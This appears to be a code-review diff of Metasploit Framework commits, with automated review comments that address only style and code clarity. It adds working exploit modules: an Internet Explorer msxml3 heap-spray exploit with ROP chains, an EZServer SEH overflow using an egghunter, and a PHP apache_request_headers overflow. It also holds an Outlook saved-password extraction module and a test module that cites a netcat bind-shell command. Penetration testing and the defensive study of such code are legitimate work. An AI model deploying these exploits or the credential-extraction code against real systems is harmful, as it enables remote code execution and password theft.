+ 'BadChars' => "\x00",
+ 'Space' => 1024
+ },
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => "none",
+ 'InitialAutoRunScript' => 'migrate -f'
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ # msxml3.dll 8.90.1101.0
+ [ 'Automatic', {} ],
+ [
+ 'IE 6 on Windows XP SP3',
+ {
+ 'Offset' => '0x100',
+ 'Rop' => nil
+ }
+ ],
+ [
+ 'IE 7 on Windows XP SP3',
+ {
+ 'Offset' => '0x100',
+ 'Rop' => nil
+ }
+ ],
+ [
+ 'IE 8 on Windows XP SP3',
+ {
+ 'Rop' => :msvcrt,
+ 'RopChainOffset' => '0x5f4',
+ 'Offset' => '0x0',
+ 'StackPivot' => 0x77c15ed5, # xchg eax, esp # ret # from msvcrt.dll
+ }
+ ],
+ [
+ 'IE 8 with Java 6 on Windows XP SP3',
+ {
+ 'Rop' => :jre,
+ 'RopChainOffset' => '0x5f4',
+ 'Offset' => '0x0',
+ 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
+ }
+ ],
+ [
+ 'IE 8 with Java 6 on Windows 7 SP1',
+ {
+ 'Rop' => :jre,
+ 'RopChainOffset' => '0x5f4',
+ 'Offset' => '0x0',
+ 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Jun 12 2012",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
+ ], self.class)
+ end
+
+ def get_target(agent)
+ #If the user is already specified by the user, we'll just use that
+ return target if target.name != 'Automatic'
+
+ if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
+ return targets[1] #IE 6 on Windows XP SP3
+ elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
+ return targets[2] #IE 7 on Windows XP SP3
+ elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
+ return targets[3] #IE 8 on Windows XP SP3
+ elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
+ return targets[5] #IE 8 on Windows 7 SP1
+ else
+ return nil
+ end
+ end
+
+ def junk(n=4)
+ return rand_text_alpha(n).unpack("V").first
+ end
+
+ def nop
+ return make_nops(4).unpack("V").first
+ end
+
+ def ret(t)
+ case t['Rop']
+ when :msvcrt
+ return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
+ when :jre
+ return [ 0x7c347f98 ].pack("V") # RETN (ROP NOP) # msvcr71.dll
+ end
+ end
+
+ def popret(t)
+ case t['Rop']
+ when :msvcrt
+ return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
+ when :jre
+ return [ 0x7c376541 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcr71.dll
+ end
+ end
+
+ def get_rop_chain(t)
+
+ adjust = ret(t)
+ adjust << popret(t)
+ adjust << [ t['StackPivot'] ].pack("V")
+ adjust << ret(t) * 4 # first call to a "ret" because there is a good gadget in the stack :)
+
+ # Both ROP chains generated by mona.py - See corelan.be
+ case t['Rop']
+ when :msvcrt
+ print_status("Using msvcrt ROP")
+ rop =
+ [
+ 0x77c4e392, # POP EAX # RETN
+ 0x77c11120, # <- *&VirtualProtect()
+ 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
+ junk,
+ 0x77c2dd6c,
+ 0x77c4ec00, # POP EBP # RETN
+ 0x77c35459, # ptr to 'push esp # ret'
+ 0x77c47705, # POP EBX # RETN
+ 0x00001000, # EBX
+ 0x77c3ea01, # POP ECX # RETN
+ 0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
+ 0x77c46100, # POP EDI # RETN
+ 0x77c46101, # ROP NOP (-> edi)
+ 0x77c4d680, # POP EDX # RETN
+ 0x00000040, # newProtect (0x40) (-> edx)
+ 0x77c4e392, # POP EAX # RETN
+ nop, # NOPS (-> eax)
+ 0x77c12df9, # PUSHAD # RETN
+ ].pack("V*")
+
+ when :jre
+ print_status("Using JRE ROP")
+ rop =
+ [
+ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
+ 0x00001000, # (dwSize)
+ 0x7c347f98, # RETN (ROP NOP)
+ 0x7c3415a2, # JMP [EAX]
+ 0xffffffff,
+ 0x7c376402, # skip 4 bytes
+ 0x7c345255, # INC EBX # FPATAN # RETN
+ 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
+ 0x7c344f87, # POP EDX # RETN
+ 0x00000040, # flNewProtect
+ 0x7c34d201, # POP ECX # RETN
+ 0x7c38b001, # &Writable location
+ 0x7c347f97, # POP EAX # RETN
+ 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
+ 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
+ 0x7c345c30, # ptr to 'push esp # ret '
+ ].pack("V*")
+ end
+
+ code = adjust
+ code << rop
+ return code
+ end
+
+ def on_request_uri(cli, request)
+ agent = request.headers['User-Agent']
+ my_target = get_target(agent)
+
+ # Avoid the attack if the victim doesn't have the same setup we're targeting
+ if my_target.nil?
+ print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
+ send_not_found(cli)
+ return
+ end
+
+ p = payload.encoded
+ js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
+ js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+ js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+
+ if my_target['Rop'].nil?
+ js_shellcode = "var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);"
+ else
+ js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
+ js_shellcode = <<-JS_ROP
+ var rop_chain = unescape("#{js_rop}");
+ var nops_padding = nops.substring(0, #{my_target['RopChainOffset']}-code.length-offset.length);
+ var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);
+ JS_ROP
+ js_shellcode = js_shellcode.gsub(/^\t\t\t/, '')
+ end
+
+ js = <<-JS
+ var heap_obj = new heapLib.ie(0x20000);
+ var code = unescape("#{js_code}");
+ var nops = unescape("#{js_nops}");
+ var nops_90 = unescape("#{js_90_nops}");
+
+ while (nops.length < 0x80000) nops += nops;
+ while (nops_90.length < 0x80000) nops_90 += nops_90;
+
+ var offset = nops.substring(0, #{my_target['Offset']});
+ #{js_shellcode}
+
+ while (shellcode.length < 0x40000) shellcode += shellcode;
+ var block = shellcode.substring(0, (0x80000-6)/2);
+
+
+ heap_obj.gc();
+ for (var z=1; z < 0x230; z++) {
+ heap_obj.alloc(block);
+ }
+
+ JS
+
+ js = heaplib(js, {:noobfu => true})
+
+ object_id = rand_text_alpha(4)
+
+ js_trigger = <<-TRIGGER
+ var obj = document.getElementById('#{object_id}').object;
+ var src = unescape("%u0c08%u0c0c");
+ while (src.length < 0x1002) src += src;
+ src = "\\\\\\\\xxx" + src;
+ src = src.substr(0, 0x1000 - 10);
+ var pic = document.createElement("img");
+ pic.src = src;
+ pic.nameProp;
+ obj.definition(1000);
+ TRIGGER
+
+ js_trigger = heaplib(js_trigger, {:noobfu => true})
+
+ if datastore['OBFUSCATE']
+ js = ::Rex::Exploitation::JSObfu.new(js)
+ js.obfuscate
+ js_trigger =::Rex::Exploitation::JSObfu.new(js_trigger)
+ js_trigger.obfuscate
+ end
+
+ html = <<-EOS
+ <html>
+ <head>
+ <script>
+ #{js}
+ </script>
+ </head>
+ <body>
+ <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="#{object_id}"></object>
+ <script>
+ #{js_trigger}
+ </script>
+ </body>
+ </html>
+ EOS
+
+ html = html.gsub(/^\t\t/, '')
+
+ print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
+ send_response(cli, html, {'Content-Type'=>'text/html'})
+
+ end
+
+end
+
+=begin
+(e34.358): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=7498670c ebx=00000000 ecx=5f5ec68b edx=00000001 esi=7498670c edi=0013e350
+eip=749bd772 esp=0013e010 ebp=0013e14c iopl=0 nv up ei pl nz na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
+msxml3!_dispatchImpl::InvokeHelper+0xb4:
+749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:5f5ec6a3=????????
+
+
+0:008> r
+eax=020bf2f0 ebx=00000000 ecx=00000000 edx=00000001 esi=020bf2f0 edi=020bf528
+eip=749bd772 esp=020bf1a8 ebp=020bf2e4 iopl=0 nv up ei pl nz na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
+msxml3!_dispatchImpl::InvokeHelper+0xb4:
+749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:00000018=????????
+0:008> k
+ChildEBP RetAddr
+020bf2e4 749bdb13 msxml3!_dispatchImpl::InvokeHelper+0xb4
+020bf320 749d4d84 msxml3!_dispatchImpl::Invoke+0x5e
+020bf360 749dcae4 msxml3!DOMNode::Invoke+0xaa
+020bf394 749bd5aa msxml3!DOMDocumentWrapper::Invoke+0x50
+020bf3f0 749d6e6c msxml3!_dispatchImpl::InvokeEx+0xfa
+020bf420 633a6d37 msxml3!_dispatchEx<IXMLDOMNode,&LIBID_MSXML2,&IID_IXMLDOMNode,0>::InvokeEx+0x2d
+020bf460 633a6c75 jscript!IDispatchExInvokeEx2+0xf8
+020bf49c 633a9cfe jscript!IDispatchExInvokeEx+0x6a
+020bf55c 633a9f3c jscript!InvokeDispatchEx+0x98
+020bf590 633a77ff jscript!VAR::InvokeByName+0x135
+020bf5dc 633a85c7 jscript!VAR::InvokeDispName+0x7a
+020bf60c 633a9c0b jscript!VAR::InvokeByDispID+0xce
+020bf7a8 633a5ab0 jscript!CScriptRuntime::Run+0x2989
+020bf890 633a59f7 jscript!ScrFncObj::CallWithFrameOnStack+0xff
+020bf8dc 633a5743 jscript!ScrFncObj::Call+0x8f
+020bf958 633891f1 jscript!CSession::Execute+0x175
+020bf9a4 63388f65 jscript!COleScript::ExecutePendingScripts+0x1c0
+020bfa08 63388d7f jscript!COleScript::ParseScriptTextCore+0x29a
+020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30
+020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219
+
+=end
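Review bot: `heaplib` is applied twice in `on_request_uri`, once to `js` and again to `js_trigger`, so the heapLib source is presumably emitted into both `<script>` blocks even though `js_trigger` only uses `document` and `unescape`; dropping the second `heaplib(js_trigger, {:noobfu => true})` call avoids defining the library twice in the page (this assumes `heaplib` prepends the library to its argument, which cannot be confirmed from the hunk). The comment `#If the user is already specified by the user` in `get_target` should read `# If the target was already specified by the user`. `get_target` returns `targets[5]` for every `NT 6.1` / `MSIE 8` agent, so the `IE 8 with Java 6 on Windows XP SP3` target is never chosen automatically; a comment noting that it must be selected by hand would save users a guess.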
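--- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
+++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def initialize(info = {})
 super(update_info(info,
- 'Name' => 'ComSndFTP v1.3.7 Beta USER Buffer Overflow',
+ 'Name' => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability',
 'Description' => %q{
 This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially
 crafted format string specifier as a username. The crafted username is sent to to the server to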
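--- a/modules/exploits/windows/http/ezserver_http.rb
+++ b/modules/exploits/windows/http/ezserver_http.rb
@@ -0,0 +1,89 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::Egghunter
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'EZHomeTech EzServer <= 6.4.017 Stack Buffer Overflow Vulnerability',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in the EZHomeTech EZServer. If a malicious
+ user sends packets containing an overly long string, it may be possible to execute a
+ payload remotely. Due to size constraints, this module uses the Egghunter technique.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'modpr0be<modpr0be[at]spentera.com>' # Original discovery and Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '19266' ],
+ [ 'URL', 'http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => 'seh'
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x0a\x0d\x20\x2e\x2f\x3a",
+ 'DisableNops' => true
+ },
+ 'Targets' =>
+ [
+ [ 'EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)',
+ {
+ 'Ret' => 0x10212779, # pop ecx # pop ebx # ret 4 - msvcrtd.dll
+ 'Offset' => 5852
+ }
+ ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Jun 18 2012',
+ 'DefaultTarget' => 0))
+
+ register_options([Opt::RPORT(8000)], self.class)
+
+ end
+
+ def exploit
+ connect
+ eggoptions =
+ {
+ :checksum => true,
+ :eggtag => "w00t"
+ }
+
+ hunter = generate_egghunter(payload.encoded,payload_badchars,eggoptions)
+ egg = hunter[1]
+ buff = rand_text(target['Offset'] - egg.length) #junk
+ buff << egg
+ buff << make_nops(32)
+ buff << generate_seh_record(target.ret)
+ buff << make_nops(16)
+ buff << hunter[0]
+ buff << rand_text_alpha_upper(500)
+
+ print_status("Triggering shellcode now...")
+ print_status("Please be patient, the egghunter may take a while..")
+
+ sock.put(buff)
+
+ handler
+ disconnect
+
+ end
+end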
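Review bot: The argument list on `hunter = generate_egghunter(payload.encoded,payload_badchars,eggoptions)` has no spaces after its commas, and the author entry `'modpr0be<modpr0be[at]spentera.com>'` runs the handle straight into the address, whereas the other new modules in this commit space their call arguments and write authors as `'name <addr>'`. The trailing `#junk` on the `rand_text` line says nothing about the arithmetic it sits on; `# padding so the egg ends exactly at target['Offset']` would, since `rand_text(target['Offset'] - egg.length)` followed by `buff << egg` is what fixes the egg's position. The `'Ret'` comment `# pop ecx # pop ebx # ret 4 - msvcrtd.dll` would also read better with the gadget's purpose named, e.g. `# SEH handler: pop/pop/ret gadget in msvcrtd.dll`.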
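--- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb
+++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb
@@ -0,0 +1,121 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'PHP apache_request_headers Function Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack based buffer overflow in the CGI version of PHP
+ 5.4.x before 5.4.3. The vulnerability is due to the insecure handling of the
+ HTTP headers.
+
+ This module has been tested against the thread safe version of PHP 5.4.2,
+ from "windows.php.net", running with Apache 2.2.22 from "apachelounge.com".
+ },
+ 'Author' =>
+ [
+ 'Vincent Danen', # Vulnerability discovery
+ 'juan vazquez', # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'CVE', '2012-2329'],
+ [ 'OSVDB', '82215'],
+ [ 'BID', '53455'],
+ [ 'URL', 'http://www.php.net/archive/2012.php#id2012-05-08-1' ],
+ [ 'URL', 'http://www.php.net/ChangeLog-5.php#5.4.3'],
+ [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=820000' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'Space' => 1321,
+ 'DisableNops' => true,
+ 'BadChars' => "\x00\x0d\x0a\x5f\x80\x8e\x9e\x9f" + (0x41..0x5a).to_a.pack("C*") + (0x82..0x8c).to_a.pack("C*") + (0x91..0x9c).to_a.pack("C*"),
+ 'EncoderType' => Msf::Encoder::Type::NonUpperUnderscoreSafe,
+ 'EncoderOptions' =>
+ {
+ 'BufferOffset' => 0x0
+ }
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ ['Windows XP SP3 / Windows 2003 Server SP2 (No DEP) / PHP 5.4.2 Thread safe',
+ {
+ 'Ret' => 0x1002aa79, # ppr from php5ts.dll
+ 'Offset' => 1332
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'May 08 2012'))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The URI path to the php using apache_request_headers', '/php/test.php']),
+ ], self.class)
+
+ end
+
+ def exploit
+ print_status("Trying target #{target.name}...")
+
+ # Make ECX point to the start of the encoded payload
+ align_ecx = "pop esi\n" # "\x5e"
+ esi_alignment = target['Offset'] + # Space from the start of align_ecx to nseh handler
+ 8 + # len(nseh + seh)
+ 5 - # len(call back)
+ 11 # len(align_ecx)
+ align_ecx << "add esi, -#{esi_alignment}\n" # "\x81\xC6" + 4 bytes imm (ex: "\xCA\xFA\xFF\xFF")
+ align_ecx << "sub ecx, ecx\n" # "\x29\xC9"
+ align_ecx << "add ecx, esi" # "\x01\xf1"
+ sploit = Metasm::Shellcode.assemble(Metasm::Ia32.new, align_ecx).encode_string
+ # Encoded payload
+ sploit << payload.encoded
+ # Padding if needed
+ sploit << rand_text(target['Offset']-sploit.length)
+ # SEH handler overwrite
+ sploit << generate_seh_record(target.ret)
+ # Call back "\xE8" + 4 bytes imm (ex: "\xBF\xFA\xFF\xFF")
+ sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['Offset']+8}").encode_string
+ # Make it crash
+ sploit << rand_text(4096 - sploit.length)
+
+ print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
+
+ res = send_request_cgi({
+ 'uri' => target_uri.to_s,
+ 'method' => 'GET',
+ 'headers' =>
+ {
+ "HTTP_X_#{rand_text_alpha_lower(4)}" => sploit,
+ }
+ })
+
+ if res and res.code == 500
+ print_status "We got a 500 error code. Even without a session it could be an exploitation signal!"
+ end
+
+ handler
+ end
+end
+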
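Review bot: `if res and res.code == 500` uses `and`, whose precedence is lower than assignment and differs from `&&`; write `if res && res.code == 500` so the condition reads as the rest of the module's boolean logic does. The payload `'Space' => 1321` and the target `'Offset' => 1332` are coupled through the 11-byte `align_ecx` stub assembled in `exploit` (1321 + 11 = 1332, the same 11 the `esi_alignment` arithmetic subtracts), but nothing records that; a comment on the target entry such as `# Offset = payload Space (1321) + 11-byte align_ecx stub; keep in sync` would stop the two drifting apart. `print_status "We got a 500 error code..."` also drops the parentheses every other `print_status` call in the method uses.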
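--- a/modules/post/windows/gather/credentials/outlook.rb
+++ b/modules/post/windows/gather/credentials/outlook.rb
@@ -1,4 +1,4 @@
-# $Id$
+# $Id: outlook.rb 14835 2012-03-01 22:15:05Z rapid7 $
 ##
 # This file is part of the Metasploit Framework and may be subject to
@@ -22,16 +22,16 @@ def initialize(info={})
 super( update_info( info,
 'Name' => 'Windows Gather Microsoft Outlook Saved Password Extraction',
 'Description' => %q{
- This module extracts and attempts to decrypt saved Microsoft
+ This module extracts and decrypts saved Microsoft
 Outlook (versions 2002-2010) passwords from the Windows
 Registry for POP3/IMAP/SMTP/HTTP accounts.
 In order for decryption to be successful, this module must be
- executed with the same privileges as the user which originally
+ executed under the same privileges as the user which originally
 encrypted the password.
 },
 'License' => MSF_LICENSE,
 'Author' => [ 'Justin Cacak'],
- 'Version' => '$Revision$',
+ 'Version' => '$Revision: 14835 $',
 'Platform' => [ 'windows' ],
 'SessionTypes' => [ 'meterpreter' ]
 ))
@@ -113,6 +113,7 @@ def get_registry
 if smtp_use_auth != nil
 smtp_user = get_valdata(k, 'SMTP User')
 smtp_password = get_valdata(k, 'SMTP Password')
+ smtp_auth_method = get_valdata(k, 'SMTP Auth Method')
 end
 if pop3_server != nil
@@ -126,7 +127,7 @@ def get_registry
 end
 #Decrypt password and output results. Need to do each separately due to the way Microsoft stores them.
- print_status("Account Found:")
+ print_good("Account Found:")
 print_status(" Type: #{type}")
 print_status(" User Display Name: #{displayname}")
 print_status(" User E-mail Address: #{email}")
@@ -172,16 +173,22 @@ def get_registry
 portnum = pop3_port
 end
- if smtp_use_auth == nil # Account for SMTP servers requiring authentication
+ if smtp_use_auth == nil # Account for SMTP servers requiring authentication
 print_status(" Outgoing Mail Server (SMTP): #{smtp_server}")
 else
 print_status(" Outgoing Mail Server (SMTP): #{smtp_server} [Authentication Required]")
+ # Check if smtp_auth_method is null. If so, the inbound credentials are utilized
+ if smtp_auth_method == nil
+ smtp_user = pop3_user
+ smtp_decrypted_password = pass
+ else
+ smtp_password.slice!(0,1)
+ smtp_decrypted_password = decrypt_password(smtp_password)
+ end
 print_status(" Outgoing Mail Server (SMTP) User Name: #{smtp_user}")
- smtp_password.slice!(0,1)
- smtp_decrypted_password = decrypt_password(smtp_password)
 print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}")
 end
-
+
 smtp_use_ssl = get_valdata(k, 'SMTP Use SSL')
 if smtp_use_ssl == nil
 print_status(" SMTP Use SSL: No")
@@ -271,9 +278,15 @@ def get_registry
 print_status(" Outgoing Mail Server (SMTP): #{smtp_server}")
 else
 print_status(" Outgoing Mail Server (SMTP): #{smtp_server} [Authentication Required]")
+ # Check if smtp_auth_method is null. If so, the inbound credentials are utilized
+ if smtp_auth_method == nil
+ smtp_user = imap_user
+ smtp_decrypted_password = pass
+ else
+ smtp_password.slice!(0,1)
+ smtp_decrypted_password = decrypt_password(smtp_password)
+ end
 print_status(" Outgoing Mail Server (SMTP) User Name: #{smtp_user}")
- smtp_password.slice!(0,1)
- smtp_decrypted_password = decrypt_password(smtp_password)
 print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}")
 end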
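Review bot: The block added under `[Authentication Required]` in the POP3 branch (hunk at -172,16) is repeated verbatim in the IMAP branch (hunk at -271,9), differing only in `pop3_user` versus `imap_user`; a small private helper taking the inbound user name and decrypted password would keep the two from diverging. In the `else` arm, `smtp_password.slice!(0,1)` is still called without checking that `get_valdata(k, 'SMTP Password')` returned anything, so if that helper yields nil for a missing value, as the surrounding `!= nil` checks suggest, an account with an auth method set but no stored password raises NoMethodError — a `smtp_password.nil?` guard that prints the user name and skips the password would avoid that (this predates the change but the new branch is where it now bites). `smtp_auth_method == nil` is more idiomatically `smtp_auth_method.nil?`, and the comment `# Check if smtp_auth_method is null` should say nil and state the intent: `# No explicit SMTP auth method stored: reuse the inbound account's credentials`. get_registry begins and ends outside these hunks.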
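--- a/msfvenom
+++ b/msfvenom
@@ -13,15 +13,11 @@ require 'fastlib'
 require 'msfenv'
-
 $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
 Status = "[*] "
 Error = "[-] "
-require 'rex'
-require 'msf/ui'
-require 'msf/base'
 require 'optparse'
 def parse_args
@@ -51,8 +47,7 @@ def parse_args
 opts[:nopsled] = n.to_i
 end
- formats = Msf::Simple::Buffer.transform_formats + Msf::Util::EXE.to_executable_fmt_formats
- opt.on('-f', '--format [format]', String, "Format to output results in: #{formats.join(', ')}") do |f|
+ opt.on('-f', '--format [format]', String, "Output format (use --help-formats for a list)") do |f|
 opts[:format] = f
 end
@@ -65,16 +60,16 @@ def parse_args
 opts[:arch] = a
 end
- opt.on('', '--platform [platform]', String, 'The platform of the payload') do |l|
- opts[:platform] = Msf::Module::PlatformList.transform(l)
+ opt.on('--platform [platform]', String, 'The platform of the payload') do |l|
+ opts[:platform] = l
 end
 opt.on('-s', '--space [length]', Integer, 'The maximum size of the resulting payload') do |s|
 opts[:space] = s
 end
 opt.on('-b', '--bad-chars [list] ', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b|
- opts[:badchars] = Rex::Text.hex_to_raw(b)
+ opts[:badchars] = b
 end
 opt.on('-i', '--iterations [count] ', Integer, 'The number of times to encode the payload') do |i|
@@ -96,8 +91,8 @@ def parse_args
 opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do
 opts[:inject] = true
 end
-
- opt.on('-o', '--options', 'List the payload\'s standard options') do
+
+ opt.on('-o', '--options', "List the payload's standard options") do
 opts[:list_options] = true
 end
@@ -106,9 +101,23 @@ def parse_args
 exit(1)
 end
+ opt.on_tail('--help-formats', String, "List available formats") do
+ require 'rex'
+ require 'msf/ui'
+ require 'msf/base'
+ $framework = Msf::Simple::Framework.create(
+ :module_types => [],
+ 'DisableDatabase' => true
+ )
+ puts "Executable formats"
+ puts "\t" + Msf::Util::EXE.to_executable_fmt_formats.join(", ")
+ puts "Transform formats"
+ puts "\t" + Msf::Simple::Buffer.transform_formats.join(", ")
+ exit 1
+ end
+
 begin
 opt.parse!
-
 rescue OptionParser::InvalidOption, OptionParser::MissingArgument
 puts "Invalid option, try -h for usage"
 exit(1)
@@ -243,7 +252,11 @@ end
 datastore, opts = parse_args
-$framework = Msf::Simple::Framework.create(
+require 'rex'
+require 'msf/ui'
+require 'msf/base'
+
+$framework ||= Msf::Simple::Framework.create(
 :module_types => [Msf::MODULE_PAYLOAD, Msf::MODULE_ENCODER, Msf::MODULE_NOP],
 'DisableDatabase' => true
 )
@@ -282,22 +295,32 @@ if opts[:payload]
 exit
 end
 if opts[:list_options]
- print_status("Options for #{payload.fullname}\n\n" +
+ print_status("Options for #{payload.fullname}\n\n" +
 ::Msf::Serializer::ReadableText.dump_options(payload,' '))
 exit
 end
 end
 end
+
+# Normalize the options
+opts[:platform] = Msf::Module::PlatformList.transform(opts[:platform]) if opts[:platform]
+opts[:badchars] = Rex::Text.hex_to_raw(opts[:badchars]) if opts[:badchars]
+
 # set the defaults unless something is already set by the user
 if opts[:payload] != 'stdin'
 opts[:arch] ||= payload.arch[0]
 opts[:platform] ||= payload.platform.platforms
 else
 # defaults for stdin payloads users should define them
- print_error("Using X86 architecture and Windows platform for stdin payload to change use -a and --platform")
- opts[:arch] ||= "x86"
- opts[:platform] ||= Msf::Module::PlatformList.transform("Windows")
+ unless opts[:arch]
+ print_error("Defaulting to x86 architecture for stdin payload, use -a to change")
+ opts[:arch] = "x86"
+ end
+ unless opts[:platform]
+ print_error("Defaulting to Windows platform for stdin payload, use --platform to change")
+ opts[:platform] = Msf::Module::PlatformList.transform("Windows")
+ end
 end
 opts[:format] ||= 'ruby'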
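Review bot: The new `--help-formats` handler (hunk at -106,9) ends with `exit 1` after it has successfully printed both format lists, so shells and wrapper scripts see a successful help request as a failure; a bare `exit` (as the `--options` listing further down uses) or `exit 0` is the right status. The `String` passed in `opt.on_tail('--help-formats', String, "List available formats")` is an argument type on a switch that takes no value and serves no purpose there; dropping it, `opt.on_tail('--help-formats', "List available formats") do`, leaves it a plain flag and removes any chance OptionParser reads it as demanding an argument. The `$framework = Msf::Simple::Framework.create(:module_types => [], ...)` inside the handler is presumably there only so the `Msf::Util::EXE` and `Msf::Simple::Buffer` helpers are loaded; a comment such as `# minimal framework instance: no modules loaded, only needed for the format helpers` would explain why it differs from the full `$framework ||=` created after parse_args. parse_args itself starts and ends outside these hunks.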
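--- a/test/modules/exploits/test/shell.rb
+++ b/test/modules/exploits/test/shell.rb
@@ -0,0 +1,60 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ManualRanking
+
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Command Test',
+ 'Description' => %q{
+ This module tests cmd payloads by targeting (for example) a server
+ like: nc -l -p 31337 -e /bin/sh
+ },
+ 'Author' => 'egypt',
+ 'Version' => '$Revision$',
+ 'References' => [ ],
+ 'DefaultOptions' => { },
+ 'Payload' =>
+ {
+ },
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Targets' =>
+ [
+ [ 'Automatic Targeting', { } ],
+ ],
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(31337),
+ ], self.class)
+ end
+
+ def autofilter
+ false
+ end
+
+ def exploit
+ connect
+
+ sock.put(payload.encoded + "\n")
+
+ handler
+ end
+
+end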
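Review bot: `autofilter` returning `false` is the one override in this test module whose purpose is not obvious from the code, and it carries no comment; something like `# Test-only module: opt out of automatic module selection` (if that is what the base-class hook is for — its definition is outside this file) would tell a reader why it is here and why it is safe to keep. The empty `'References' => [ ]`, `'DefaultOptions' => { }` and `'Payload' => { }` entries add nothing a reader can act on; either drop them or add a one-line comment that the module deliberately carries no metadata because it only exists to exercise cmd payloads.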
